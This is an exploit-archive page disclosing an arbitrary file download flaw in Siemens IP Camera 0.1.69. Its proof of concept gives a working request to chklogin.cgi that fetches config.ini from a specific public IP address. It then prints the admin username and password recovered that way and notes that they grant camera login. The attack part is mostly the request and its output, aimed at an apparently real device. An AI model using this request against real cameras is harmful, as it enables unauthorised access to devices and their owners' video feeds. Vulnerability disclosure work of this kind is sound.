Siemens IP Camera 0.1.69 Arbitrary File Download

2016.09.15

Credit: vuppala.Dhanunjaya

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-200

#Exploit Title: Siemens IP Camera :: Arbitrary file download
# Date: [14-september-2016]
# Exploit Author: [vuppala.Dhanunjaya]
# Vendor Homepage: [www.siemens.com]
# Version: [V0.1.69]
# Tested on: [Windows 10,ubuntu 14.04 LTS]
# Email : vuppaladhani@gmail.com
========================================
TEAM
========================================
Harsha Vardhan (https://www.facebook.com/HarshaHere)
Santosh Kumar (https://www.facebook.com/M4drob0t)
Akhil Manikanth(https://www.facebook.com/IaMAkIlManIkAnTh)
Manish Yadav (https://www.facebook.com/spikeymanish)
Thankyou for the support
========================================
TECHNICAL DETAILS & POC
========================================
Target : https://78.56.240.235/cgi-bin/chklogin.cgi?rnd=1473849790369
Downloding the config file : cgi-bin/chklogin.cgi?file=config.ini
https://78.56.240.235/cgi-bin/chklogin.cgi?file=config.ini
this config.ini file contains the username nd password of the administration login
account.admin.user_id=admin
account.admin.password=admin
account.admin.language=english
using this login credentials we can get into the IPcam
Thankyou

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Siemens IP Camera 0.1.69 Arbitrary File Download

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.